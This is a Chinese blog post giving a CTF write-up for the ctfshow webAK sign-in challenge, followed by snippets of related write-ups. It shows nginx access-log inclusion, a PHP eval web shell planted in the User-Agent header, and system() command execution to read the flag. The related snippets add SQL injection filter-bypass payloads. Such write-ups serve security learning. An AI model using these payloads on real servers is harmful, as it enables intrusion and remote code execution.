CTFshow webAK赛 (签到_观己)

最新推荐文章于 2022-09-25 10:40:41 发布
最新推荐文章于 2022-09-25 10:40:41 发布
阅读量528 收藏 1
点赞数 2
分类专栏: CTF 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54786552/article/details/118759479
版权

1.打开环境

Fn+F12(或者F12) 检查元素,打开Hackbar。

Hackbar 安装教程

 2.首先访问file=/var/log/nginx/access.log看日志文件是否存在

一句话木马:

<?php @eval($_GET['pass']);?>

 上述操作结果如下:

3.添加: &pass=phpinfo();

效果:

 (emm..有点走远了.....)

4. 改成:   &pass=system("cat /flag.txt");

 找到flag了!!!!!

何小仙_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow webAK
qq_45655564的博客
09-01 284
签到_己 web1_字 web2_星 点击不同的链接上方的url处id会有变化,所以可能是SQL注入 于是试了几下,令id2/2发现是id=1的界面,可以确定是数字型注入,然后又发现它过滤了一些东西 所以,就fuzz了一下,发现主要困难在于过滤了逗号,like,等于号。所以我们只好盲注了。 首先爆数据库 0^(length(database())regexp(4)) 可以知到数据库长度是4 然后 0^(substr(database()from/**/1/**/for/**/1)regexp()
ctfshow-WEB AK-签到_
博客地址 www.sec0nd.top
02-25 2483
文章目录题目分析解题过程 题目分析 打开网页 正则匹配过滤了php,且大小写不敏感 allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题 解题过程 ?file=/var/log/nginx/access.log 发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话 在UA中添加一句话木马 <?php eval($_POST[1]);?> 在POST中令1=system('ls /');查看根目录中的文件 发现有个flag.txt 这里应该就是fl
[ctf.show]签到_
Rabbit_Gray的博客
08-16 815
进入题目,显示了源码,其中对于file参数中检测是否包含php字符串,大小写不敏感。 所以伪协议 php://input 等无法使用 测试了一下data://伪协议,结果显示目标服务器配置中关闭了这个伪协议 从服务器返回的响应头中可以知道服务器是nginx服务器 nginx服务器的访问日志文件路径是/var/log/nginx/access.log 尝试包含了一下日志文件,成功 访问日志文件记录了服务器收到的每一次请求的 IP、访问时间、URL、User-Agent,这4..
WEB AK 签到_
m0_51959550的博客
07-15 92
WEB AK 签到_己 使用HackBar 在User Agent中写入一句话木马 <?php @eval($_GET['pass']);?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WxQLGQkq-1626326434628)(C:\Users\DELL\AppData\Roaming\Typora\typora-user-images\image-20210715130901720.png)] 添加&pass=phpinfo();
ctfshow-web-AK-
山可行,海可平
07-18 145
初态分析 2个if-else嵌套: 若传入file参数则有变换,没有传入则高亮显示 检查file变脸中存储的值是否含有“php”,若没有,则包含该文件 有include可以考虑是文件包含方向,但是不知道文件是什么 解题思路 要上传文件,但是这里没有提示要上传什么----->考虑直接在url传入或传上面有的 用data://----->不行 过滤掉php,所有跟php有关的都不能用 还剩下日志包含 用日志包含,先抓包再在其中加入信息 改UA头,将木马传
CTFSHOW web_AK
yao_xin_de_yuan的博客
07-31 429
CTFSHOW web_AK 签到——己 文件包含漏洞 php伪协议 看源码过滤了php,开始想的是php伪协议,但是试了一下allow_url_include=off,data://用不了。最后尝试了一下直接读/flag,/flag.txt。发现在/flag.txt直接读出了flag. 日志包含 传?file=/var/log/nginx/access.log过去发现nginx访问日志可以访问。 写一句话<? eval($_POST['hack']);?>到UA里面,go。 使用蚁剑
ctfshow-WEB-web1签到
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
第二届BMZCTF公开CRYPTO的签到
沐一 · 林 的博客
02-03 381
第二届BMZCTF公开CRYPTO的签到 打开附件发现一串密文: 56465a7757464977546d464e656b354b5632786b5346457862336c4f4d4842485632785a4d6c5a47556c46554d557057556a464e656c5a466146465756444135554651774f5642525054303d . . 直接用 ciphey 智能分析看看: 直接得到flag。 . . 解毕! 敬礼! ...
ctfshow-WEB AK-web2_
博客地址 www.sec0nd.top
02-27 790
第一眼这个题目,跟前几天做过的很像 点一个文章发现地址栏上有个id参数,应该是注入了 令id=1’返回enheng?发现’被过滤了,fuzz测试过滤了空格、’、"、=、like、ascii、union、order by、|、sleep、 。 常用的盲注payload为payload=1^if(ascii(substr('flag',1,1))=104,1,0) 过滤了空格可以用括号代替; 过滤了单引号可以用16进制代替; 过滤了逗号,对于substr可以用 substr(database() from.
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1023
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
SUCTF web CheckIn
weixin_42499640的博客
08-19 2702
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
WMCTF2020 web之web_checkin
Firebasky的博客
08-04 2618
这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。 NU1L真的太强了,向他们看齐!!! 题目:web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP @mkdir($sandbox);//创建一个文件 @chdir($sandbox);.
ctfshow 大牛杯web
羽的博客
05-03 9675
文章目录web_checkineasy_unserializeeasy_cms web_checkin 输入 ?code=?><?=`nl%09*` 得到源码 很明显是想让我们条件竞争。 生成文件 ?code=`nl%09/*>b` 开始竞争 import requests import threading import sys session=requests.session() url1="http://ba2bd9c4-6f58-45a1-a637-3cf0140e89c1.c
[两小时AK] - MISC - 签签
MrTreebook的博客
05-10 253
[两小时AK] - MISC - 签签1.winhex打开2.base64解码 1.winhex打开 2.base64解码
ctfshow-WEB_AK
qq_44657899的博客
08-01 5190
签到_己(日志包含) 文件包含一般下面几种协议,不过这些协议这道题都用不起: 除了猜,还有日志包含。 首先访问file=/var/log/nginx/access.log看日志文件是否存在。 然后访问aaaaaaaaaaa,再查看日志文件,已经被记录到了日志文件中。 因为url中会被编码,所以在UA中加入一句话木马<?php @eval($_GET['pass']);?>,成功写入日志。 随后蚁剑链接:http://0bb8f2b6-74cb-4fd9-860d-a4d246c8aa1
ctfshow web学习记录
m0_64815693的博客
09-25 2581
ctfshow 学习记录
CTFSHOW WEB_AK
羽的博客
07-31 3029
签到_己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
ctfshow_web_AK
m0_62422842的博客
06-08 440
这些题涉及到的知识点主要有日志包含,url的绕过,数字型盲注的一些bypass以及脚本的编写,还有php语言的应用。
ctfshow webak
最新发布
09-10
根据以上信息,我无法详细回答你关于ctfshow webak的问题。因为提供的引用内容并没有直接涉及到ctfshow webak这个特定的问题。请提供更多相关的引用内容或者具体的问题,以便我能够给出更准确的回答。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值